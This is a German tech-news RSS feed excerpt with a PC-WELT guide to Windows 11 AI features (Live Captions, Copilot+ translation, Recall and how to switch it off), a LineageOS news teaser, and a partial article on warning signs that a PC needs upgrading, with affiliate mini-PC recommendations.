<p>Windows 11 bringt mehrere KI-Funktionen mit, die sofort weiterhelfen. Live-Untertitel zeigen jeden Ton als Text, eine Echtzeit-Übersetzung <a href="https://www.pcwelt.de/article/3141725/snapdragon-x2-elite-ki-notebook-rechenleistung.html" target="_blank" rel="noreferrer noopener">läuft auf passender Hardware</a>, und <a href="https://www.pcwelt.de/article/3141121/windows-recall-deaktivieren-screenshots-loeschen-datenschutz.html" target="_blank" rel="noreferrer noopener">Recall</a> durchsucht zurückliegende Bildschirminhalte. Manches steht jedem offen, anderes hängt am Gerät.</p>



<p>Microsoft verteilt die KI-Funktionen schrittweise und nach Hardware gestaffelt. Ältere Rechner erhalten die Grundfunktionen, neuere Geräte mit eigener KI-Einheit bekommen mehr. Nicht jedes System zeigt sofort alle Optionen, und mit jedem größeren Update kommt Weiteres hinzu. Mehrere Funktionen helfen schon heute im täglichen Einsatz, ohne dass Sie Zusatzsoftware installieren müssen. Die <a href="https://support.microsoft.com/de-de/accessibility/windows/use-live-captions-to-better-understand-audio">offizielle Anleitung zu den Live-Untertiteln stellt Microsoft auf seinen Support-Seiten bereit</a>.</p>



<h2 class="wp-block-heading toc">Live-Untertitel verwandeln jeden Ton in Text</h2>



<p>Die Funktion fängt das Audiosignal Ihres Rechners ab, erkennt gesprochene Sprache und blendet sie als Text ein. Das funktioniert unabhängig von der App. Ob YouTube im Browser, eine Mediathek, ein Podcast, ein Hörbuch oder die Stimme des Gegenübers in einer Videokonferenz – der Text läuft mit. Der Rechner verarbeitet alles vor Ort. Nach dem einmaligen Download der Sprachdateien benötigen Sie keine Internetverbindung mehr, und nichts davon wandert in die Cloud.</p>



<p>Zum Einschalten genügt die Tastenkombination <em>Windows + Strg + L</em>. Alternativ klicken Sie sich über “<em>Einstellungen” -&gt; “Barrierefreiheit” -&gt; “Untertitel</em>” durch und stellen die Live-Untertitel auf Ein. Beim ersten Start lädt Windows die passenden Sprachpakete herunter, ein Vorgang von wenigen Sekunden. Deutsch steht für die reinen Untertitel zur Verfügung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4fa2b556036"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/ki-funktionen-01.png?w=1200" alt="Live-Untertitel in Windows 11" class="wp-image-3178657" width="1200" height="863" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Über das Zahnrad im Untertitelfenster passen Sie Position, Schriftgröße und Farbe an. Sie verschieben den Textbereich an den oberen oder unteren Rand oder lassen ihn frei schweben. Auf Wunsch bezieht die Funktion auch das Mikrofon ein und verschriftlicht Ihre eigene Stimme, praktisch bei Diktaten oder Gesprächen vor Ort.</p>



<p>Ein Filter blendet Schimpfwörter aus. Mehrere Grenzen sollten Sie kennen. Das System erkennt nur menschliche Sprache, Liedtexte und Geräusche bleiben außen vor. Treffen Mikrofon- und Computerton zusammen, hat die Tonausgabe des Rechners Vorrang.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading toc">Die Übersetzung hängt an der Hardware</h2>



<p>Die Untertitel kann Windows auch übersetzen, doch dafür gelten engere Voraussetzungen. Nötig ist ein Copilot+ PC mit eigener KI-Einheit und mindestens Windows 11 in der Version 24H2. Auf solchen Geräten überträgt das System gesprochene Inhalte aus über 40 Sprachen ins Englische und aus 27 Sprachen ins vereinfachte Chinesisch, in Echtzeit und ohne Cloud.</p>



<p>Der praktische Nutzen hat enge Grenzen. Die Zielsprache lautet Englisch oder vereinfachtes Chinesisch. Ein fremdsprachiges Video holt das System ins Englische. Für eine deutsche Ausgabe greifen Sie zu anderen Mitteln, darunter die eigenen Untertitelfunktionen von YouTube oder Netflix oder eine Übersetzung im Browser. Auf Rechnern ohne Copilot+ Technik bleiben die Standarduntertitel verfügbar, die Übersetzung erfordert die neuere Hardware.</p>



<p>Microsoft hat auf der Entwicklerkonferenz Build 2026 angekündigt, die lokale Spracherkennung und Funktionen wie die Live-Untertitel künftig auch auf normalen Prozessoren und Grafikkarten laufen zu lassen. Die Bindung an spezielle KI-Chips lockert sich damit, Microsoft verteilt die Neuerungen schrittweise über kommende Updates. Wann genau welche Sprache und welches Gerät an der Reihe ist, hat Microsoft offengelassen.</p>



<h2 class="wp-block-heading toc">Recall durchsucht alte Bildschirminhalte</h2>



<p>Recall fertigt im Abstand weniger Sekunden Momentaufnahmen Ihres Bildschirms an, speichert sie verschlüsselt auf der Festplatte und macht sie durchsuchbar. Sie beschreiben mit eigenen Worten, was Sie gesehen haben, und das System liefert die passende Stelle zurück. Eine Webseite, ein Dokument oder eine App-Ansicht von gestern findet sich so wieder, auch ohne Dateinamen oder Verlauf.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4fa2b557215"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/11/windows_recall_6.jpg?quality=50&amp;strip=all" alt="Die neue semantische Suche von Microsoft soll das Auffinden von Bildern vereinfachen, noch aber ist die Funktion nur in den Insider Builds von Windows 11 verfügbar." class="wp-image-2976485" width="934" height="582" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Die neue semantische Suche von Microsoft soll das Auffinden von Bildern vereinfachen, noch aber ist die Funktion nur in den Insider Builds von Windows 11 verfügbar.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Der Vorteil zeigt sich bei häufiger Rücksuche. Suchen Sie oft nach früher gesehenen Inhalten, sparen Sie sich das mühsame Durchklicken von Ordnern und Browserverlauf. Bei seltener Nutzung bleibt der Gewinn gering, die offenen Datenschutzfragen bestehen weiter. Recall hält fest, was auf dem Schirm erscheint, darunter private Nachrichten, Bankdaten oder Gesundheitsinformationen. Ein Filter für sensible Inhalte greift, arbeitet aber nicht lückenlos. Deshalb sperren einzelne Programme, darunter Signal und der Brave-Browser, ihre Inhalte gegen die Aufnahme.</p>



<p>Mehrere Hürden schützen Sie vorab. Recall läuft nur auf Copilot+ PCs, setzt die Anmeldung über Windows Hello voraus und bleibt nach der Einrichtung ausgeschaltet. Erst Ihre bewusste Zustimmung startet die Aufnahmen. Pro Quartal beanspruchen die Momentaufnahmen bis zu 25 Gigabyte Speicher. Einzelne Apps und Webseiten können ausgeschlossen werden, Aufnahmen pausieren oder löschen.</p>



<p>Zum Abschalten öffnen Sie “Einstellungen” -&gt; “Datenschutz und Sicherheit” -&gt; “Recall und Snapshots” und stellen die Option zum Speichern der Aufnahmen auf Aus. Vorhandene Aufnahmen entfernen Sie an gleicher Stelle. <a href="https://www.pcwelt.de/article/3141121/windows-recall-deaktivieren-screenshots-loeschen-datenschutz.html" target="_blank" rel="noreferrer noopener">Eine ausführliche Schritt-für-Schritt-Anleitung zum Deaktivieren und zum Löschen der Screenshots steht bereit</a>. </p>



<p>Zur Prüfung per Programm steht das kostenlose <a href="https://www.dpbolvw.net/click-3275038-13645854?sid=rss&amp;url=https://www.ashampoo.com/de-de/stop-recall" target="_blank" rel="noreferrer noopener">Stop Recall von Ashampoo</a> bereit. Das Tool kontrolliert den zuständigen Registry-Wert und schaltet die Funktion per Klick ab. Hilfreich ist das auch nach Updates, denn ein Update kann die Einstellung zurücksetzen. <a href="https://support.microsoft.com/de-DE/Windows/Ai/Ai-Features/retrace-your-steps-with-recall" target="_blank" rel="noreferrer noopener">Microsoft beschreibt die Funktion</a> und ihre Kontrollmöglichkeiten ebenfalls im eigenen Support.</p>



<h2 class="wp-block-heading toc">Editor und Copilot erledigen kleine Aufgaben</h2>



<p>Auch der schlichte Editor von Windows kann inzwischen KI-Funktionen nutzen. Die Schreibtools aktivieren Sie über das Zahnrad oben rechts, indem Sie in den Einstellungen ganz nach unten scrollen und die entsprechende Option einschalten. Anschließend markieren Sie einen Text, klicken mit der rechten Maustaste und lassen ihn zusammenfassen oder mithilfe vorgegebener Optionen umformulieren. Wenn Ihnen die Funktion nicht gefällt, können Sie sie an gleicher Stelle jederzeit wieder deaktivieren.</p>



<p>Der Copilot-Assistent beantwortet Fragen, formuliert Texte um und steuert auf Zuruf sogar Systemeinstellungen wie Bluetooth, die Bildschirmhelligkeit oder den Dunkelmodus. Starten lässt er sich über die Copilot-Taste auf neueren Tastaturen oder per Tastenkombination <strong>Windows + C</strong>. Viele Funktionen laufen dabei über die Cloud und erfordern ein Microsoft-Konto. Eine neue Suchfunktion namens „Ask Copilot“ soll mittelfristig die klassische Windows-Suche in der Taskleiste ersetzen, bleibt jedoch optional und wird nicht automatisch aktiviert.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[LineageOS: Web-based Flashing wird Realität]]></title>
<description><![CDATA[Die Entwickler hinter LineageOS haben ein Update-Paket geschnürt und in einem Blogpost weitreichende Neuerungen für das gesamte Ökosystem angekündigt. Neben einer runderneuerten Statistik-Seite, einem Dark Mode für das Wiki und dem Wechsel beim Issue-Tracker von GitLab zu GitHub sticht ein...Zum ...]]></description>
<link>https://tsecurity.de/de/3657167/it-nachrichten/lineageos-web-based-flashing-wird-realitaet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657167/it-nachrichten/lineageos-web-based-flashing-wird-realitaet/</guid>
<pubDate>Thu, 09 Jul 2026 15:18:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Entwickler hinter LineageOS haben ein Update-Paket geschnürt und in einem Blogpost weitreichende Neuerungen für das gesamte Ökosystem angekündigt. Neben einer runderneuerten Statistik-Seite, einem Dark Mode für das Wiki und dem Wechsel beim Issue-Tracker von GitLab zu GitHub sticht ein...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/lineageos-web-based-flashing-wird-realitaet/">LineageOS: Web-based Flashing wird Realität</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 Warnsignale, dass Ihr PC ein Upgrade braucht]]></title>
<description><![CDATA[Ein neuer PC ist selten ein spontaner Kauf: Meistens versucht man, den betagten Rechner so lange wie möglich weiter zu nutzen. Mit Blick auf die Umwelt und den Geldbeutel ergibt das durchaus Sinn.



Doch eines Tages häufen sich die Probleme: Windows-Updates bleiben aus, Programme starten quälend...]]></description>
<link>https://tsecurity.de/de/3657093/windows-tipps/5-warnsignale-dass-ihr-pc-ein-upgrade-braucht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657093/windows-tipps/5-warnsignale-dass-ihr-pc-ein-upgrade-braucht/</guid>
<pubDate>Thu, 09 Jul 2026 14:57:18 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein neuer PC ist selten ein spontaner Kauf: Meistens versucht man, den betagten Rechner so lange wie möglich weiter zu nutzen. Mit Blick auf die Umwelt und den Geldbeutel ergibt das durchaus Sinn.</p>



<p>Doch eines Tages häufen sich die Probleme: Windows-Updates bleiben aus, Programme starten quälend langsam, oder die Festplatte ist permanent voll. Spätestens wenn der Rechner im Alltag nur noch nervt oder gar nicht mehr mit aktueller Hardware Schritt halten kann, wird es Zeit für etwas Neues. Diese fünf klaren Warnsignale verraten Ihnen, wann es so weit ist.</p>



<p><strong>Tipp:</strong> Falls es Zeit für ein Upgrade ist, stellen wir Ihnen am Ende des Artikels drei starke PCs vor. Einen leistungsstarken Gaming-PC, eine günstige Office-Maschine und eine solide Multimedia-Station fürs mittlere Budget.</p>



<h2 class="wp-block-heading toc">Anzeichen Nummer 1: Kaum noch Software-Updates </h2>



<p>Regelmäßige Updates sind entscheidend, damit Ihr PC sicher und funktionsfähig bleibt. Wenn Windows oder andere wichtige Programme keine Updates mehr bekommen, ist das ein klares Warnsignal. Besonders kritisch wird es, wenn das Betriebssystem selbst nicht mehr unterstützt wird – <a href="https://www.pcwelt.de/article/2915366/windows-10-nutzer-aufgepasst-das-muessen-sie-jetzt-unbedingt-tun.html" target="_blank" rel="noreferrer noopener">wie zuletzt bei Windows 10</a>, das seit Oktober 2025 nur noch eingeschränkt <a href="https://www.pcwelt.de/article/2921217/windows-10-support-fuer-eu-nutzer-gratis-es-gibt-aber-diesen-haken.html" target="_blank" rel="noreferrer noopener">Sicherheits-Updates</a> <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates.html" target="_blank" rel="noreferrer noopener">für 24 Monate erhält.</a></p>



<p>Ohne solche Updates fehlen bald wichtige Sicherheits-Patches. Das macht einen PC anfällig für Viren, Malware und andere Angriffe aus dem Netz. Zudem laufen viele neue Programme irgendwann nur noch auf aktuellen Windows-Versionen. Altrechner bleiben dann auch softwareseitig auf der Strecke.</p>



<p><strong>Tipp:</strong> Prüfen Sie in den Windows-Einstellungen regelmäßig, ob neue Updates verfügbar sind. Wenn Ihr System dauerhaft meldet, es sei „auf dem neuesten Stand“, obwohl bereits eine neuere Windows-Version existiert, dann wird es höchste Zeit, über einen neuen PC nachzudenken.</p>



<h2 class="wp-block-heading toc">Anzeichen Nummer 2: PC schnell heiß und laut</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4f9a9e13833"}' data-wp-interactive="core/image" class="wp-block-image size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/09/HWMonitor-Screenshot.png" alt="HWMonitor Screenshot" class="wp-image-2901499" width="961" height="976" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Temperaturprobleme können Sie zum Beispiel mit dem kostenlosen <a href="https://www.pcwelt.de/article/1164870/hwmonitor-2.html" target="_blank" rel="noreferrer noopener">HWMonitor</a> aufspüren.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Ein gesundes System sollte auch unter Last einigermaßen leise bleiben. Wenn Ihr PC aber schon bei einfachen Aufgaben heißläuft und die Lüfter im Dauerbetrieb laut werden, deutet das auf veraltete oder überlastete Hardware hin. Neben der nervigen Geräuschkulisse riskieren Sie auch, dass Bauteile durch Überhitzung Schaden nehmen oder der PC in einem kritischen Moment den Dienst quittiert. Im schlimmsten Fall gehen dann wichtige Daten verloren.</p>



<p><strong>Tipp:</strong> Reinigen Sie Ihren PC zunächst von Staub und prüfen Sie die Temperatur mit Tools wie <a href="https://www.pcwelt.de/article/1164870/hwmonitor-2.html" target="_blank" rel="noreferrer noopener">HWMonitor</a>. Bleiben die Probleme trotz Wartung bestehen, ist ein Neukauf oft sinnvoller, als Kühlung oder Bauteile nachzurüsten, während man auf veralteten Komponenten sitzen bleibt.</p>



<h2 class="wp-block-heading toc">Anzeichen Nummer 3: Kaum noch Speicherplatz frei</h2>



<p>Wenn die SSD ständig überläuft, wird das Arbeiten am PC schnell zur Geduldsprobe. Windows warnt dann permanent vor zu wenig Speicher, Programme lassen sich nicht mehr installieren und selbst einfache Updates schlagen fehl. Zwar kann man kurzfristig <a href="https://www.pcwelt.de/article/2618442/die-besten-externen-portablen-ssds-test.html" target="_blank" rel="noreferrer noopener">mit einer externen Festplatte</a> oder <a href="https://www.pcwelt.de/article/1152317/speicherplatz-in-der-cloud-optimal-ausreizen.html" target="_blank" rel="noreferrer noopener">Cloud-Speicher</a> aushelfen. Auf Dauer wird es aber mühsam, ständig Daten hin- und herzuschieben.</p>



<p><strong>Tipp:</strong> Schauen Sie im Explorer nach, wie viel freier Speicher auf Ihrer System-SSD (meist „C:“) noch übrig ist. Ist die permanent voll und lässt sich nicht sinnvoll auf- oder nachrüsten,, ist ein neuer PC die bessere Lösung.</p>



<h2 class="wp-block-heading toc">Anzeichen Nummer 4: Alles läuft nur noch im Schneckentempo</h2>



<p>Ihr Rechner benötigt Minuten zum Hochfahren, Programme starten träge, und selbst einfache Aufgaben wie das Öffnen eines Browser-Tabs fühlen sich zäh an? Dann ist die Hardware schlicht zu alt oder ausgelastet. Eine <a href="https://www.pcwelt.de/article/1195856/beste-ssds.html" target="_blank" rel="noreferrer noopener">SSD</a> oder mehr <a href="https://www.pcwelt.de/article/1090983/ratgeber-pc-ram-aufruesten-schnell-und-guenstig-wie-nie.html" target="_blank" rel="noreferrer noopener">RAM</a> können dann kurzfristig helfen – sofern Sie die horrenden Preise für Arbeitsspeicher und Laufwerke bezahlen wollen oder können. Oftmals ist es dann günstiger, sich gleich einen neuen PC zu kaufen.</p>



<p><strong>Tipp:</strong> Achten Sie darauf, wie lange Ihr PC für Alltagsaufgaben braucht. Wenn sich Wartezeiten häufen und neue Software ständig ruckelt oder abstürzt, ist es an der Zeit, über ein Upgrade nachzudenken. Dann laufen Programme nicht nur schnell und geschmeidig, die Nutzung macht mit einem responsiven System auch deutlich mehr Spaß.</p>



<h2 class="wp-block-heading toc">Anzeichen Nummer 5: Upgrade nicht möglich oder nicht mehr sinnvoll</h2>



<p>Ein klares Zeichen für den fälligen PC-Wechsel ist auch, wenn sich der Rechner nicht mehr sinnvoll erweitern lässt. Alte Mainboards unterstützen oft keine aktuellen Prozessoren oder RAM-Standards, und in kleinen Fertigsystemen ist schlicht kein Platz für eine neue <a href="https://www.pcwelt.de/article/3127541/beste-grafikkarten-fuer-gamer.html" target="_blank" rel="noreferrer noopener">Grafikkarten</a> – oder das Netzteil ist zu schwach dafür. </p>



<p>Hinzu kommen veraltete Schnittstellen wie USB und PCI Express, die ebenfalls Ihren PC per se ausbremsen. Wer hier noch versucht, nachzurüsten, steckt oft viel Geld in eine alte Plattform, ohne große Leistungsverbesserung.</p>



<p><strong>Tipp:</strong> Prüfen Sie vor einem Hardware-Upgrade, ob Ihr System moderne Standards wie DDR5-RAM, PCIe 4.0 oder USB4 unterstützt. Ist das nicht der Fall, lohnt sich in vielen Fällen der Umstieg auf ein komplett neues Gerät.</p>



<h2 class="wp-block-heading toc">3 Kauftipps: Der passende PC für Office, Multimedia und Gaming</h2>



<p>Hier stellen wir Ihnen drei vorkonfigurierte PCs vor, die mit starkem Preis-Leistungs-Verhältnis punkten. Eine größere Auswahl bietet unser Beitrag “<a href="https://www.pcwelt.de/article/3003041/die-besten-mini-pcs-im-test-fur-buro-streaming-gaming-und-server.html" target="_blank" rel="noreferrer noopener">Die besten Mini-PCs im Test</a>“. </p>



<p>Preisbewusste Käufer sollten sich zusätzlich unseren Artikel “<a href="https://www.pcwelt.de/article/3143670/die-besten-mini-pcs-bis-800-euro-test.html" target="_blank" rel="noreferrer noopener">Die besten Mini-PCs bis 800 Euro im Test</a>” anschauen. Damit sparen Sie sich langes Suchen und Vergleichen. Sie können direkt ein Modell wählen, das zu Ihren Ansprüchen passt. Fürs Office, Multimedia und Gaming haben wir für Sie noch drei Empfehlungen mit dem aktuell besten Preis-Leistungs-Verhältnis herausgepickt:</p>



<h3 class="wp-block-heading">Office-Empfehlung: Peladn WO4</h3>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4f9a9e14b17"}' data-wp-interactive="core/image" class="wp-block-image size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/01/Test-PELADN-WO4.png" alt="Test PELADN WO4" class="wp-image-3033667" width="1024" height="576" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



		<div class="promo_wrap promo_wrap_sticky">
			<div class="row_wrapper">
				<div class="column_wrapper">
					<p class="eyebrow">Empfehlung Office-PC</p>
					<p class="promo-title"><strong>Mini-PC Peladn WO4 (AMD Ryzen 5 7640HS, 16 GB RAM)</strong></p>
					<p class="promo-description">ab 520 Euro</p>
				</div>
				<div class="more_btn"><a href="https://www.amazon.de/dp/B0GLN637YM?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" class="sticky-promotion-view-deal-link" data-vars-link-position="Floating Conversion Unit">Erfahren Sie mehr</a></div>
			</div>
		</div>
		


<p>Der Peladn WO4 (<a href="https://www.pcwelt.de/article/3033663/peladn-wo4-im-test.html" target="_blank" rel="noreferrer noopener">Test</a>) zeigt eindrucksvoll, wie viel durchdachte Technik heute in ein ultrakompaktes Gehäuse passt. Herzstück ist der AMD Ryzen 5 7640HS, der mit moderner Zen-4-Architektur, hoher Effizienz und starker Single-Core-Leistung selbst anspruchsvolle Aufgaben mühelos bewältigt. In Kombination mit 16 GB DDR5-RAM und der integrierten Radeon-760M-Grafik eignet sich der Mini-PC nicht nur als Office-Rechner mit hoher Produktivität, sondern bewältigt auch Multitasking-Aufgaben und KI-Workflows.</p>



<h3 class="wp-block-heading">Multimedia-Empfehlung: Geekom A9 Max 2026 Edition</h3>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4f9a9e15958"}' data-wp-interactive="core/image" class="wp-block-image size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Test-Geekom-A9-Max-2026.png" alt="Test Geekom A9 Max 2026" class="wp-image-3134101" width="1024" height="576" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



		<div class="promo_wrap promo_wrap_sticky">
			<div class="row_wrapper">
				<div class="column_wrapper">
					<p class="eyebrow">Empfehlung Multimedia-PC</p>
					<p class="promo-title"><strong>Geekom A9 Max 2026 Edition (Ryzen 9 7940HS, Radeon 780M)</strong></p>
					<p class="promo-description">ab 769 Euro</p>
				</div>
				<div class="more_btn"><a href="https://www.amazon.de/dp/B0G2BZGX1N?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" class="sticky-promotion-view-deal-link" data-vars-link-position="Floating Conversion Unit">Erfahren Sie mehr</a></div>
			</div>
		</div>
		


<p>Mit dem A9 Max 2026 Edition (<a href="https://www.pcwelt.de/article/3134099/geekom-a9-max-2026-test.html" target="_blank" rel="noreferrer noopener">Test</a>) liefert Geekom ein moderates, aber sinnvolles Update. Mit leistungsstarken AMD-Prozessoren vom Ryzen 9 7940HS bis zum Ryzen AI 9 HX 470 erreicht der Mini-PC bei Bildbearbeitung und Videoschnitt ein sehr hohes Leistungsniveau. Die Anschlussvielfalt bleibt stark, die dreijährige Garantie spricht für Geekom. Käufer erhalten ein insgesamt ausgewogenes Multimedia-Paket für die kommenden Jahre.</p>



<h3 class="wp-block-heading">Gaming-Empfehlung: Cyberpowerpc Luxe Gaming-PC</h3>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4f9a9e167e8"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/CYBERPOWERPC-Luxe-Gaming-PC-Titel.jpg?quality=50&amp;strip=all&amp;w=1200" alt="CYBERPOWERPC Luxe Gaming-PC - AMD Ryzen 7 9800X3D, Nvidia RTX 5070 Ti 16GB" class="wp-image-3166857" width="1200" height="900" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" 